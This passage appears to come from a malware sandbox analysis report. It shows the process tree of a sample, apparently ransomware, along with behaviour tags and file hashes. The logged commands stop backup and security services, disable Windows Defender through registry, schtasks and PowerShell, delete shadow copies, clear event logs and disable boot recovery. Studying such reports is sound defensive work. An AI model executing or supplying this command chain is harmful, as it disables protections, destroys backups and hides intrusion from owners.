C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:856
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:1828
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1132 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:916
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:812 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1996
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1956 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1236
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1872 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:2008
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵PID:1660
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:1060
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:548
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:892
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1736
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵PID:776
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1716
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:1604
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:524
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:1332
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1256
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:1320
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:1272
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:916
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:1964
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1492
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1720
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:744
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1560
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1392
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:680
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1744
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1908
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1648
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:652
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1748
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:616
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1968
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1840
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1640
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1056
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:716
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1704
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:268
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:576
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1168
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:392
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1356
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1768
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1136 -
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1732
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:516 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1960 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1080 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1312 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1112 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:460 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:2060 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:2084 -
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:2104
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:2124 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2140
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2160 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2224
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2244
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5498f1c253611cac413f65403757d90f8
SHA197945cc9a58405d5526f329fb7551394aba52100
SHA256ef60d8f7d1952f9c10aedc972ec5152933aa02595470d61fc6f5645f6570ca0f
SHA5127340d71e6d4cbf8a5ace8b5dcca0b6afd53d355c6ce84bf361f623f2752033f4e7f211b728df4e055842f84785fe1db54b477aa22c75b290e5add9832c6d76f3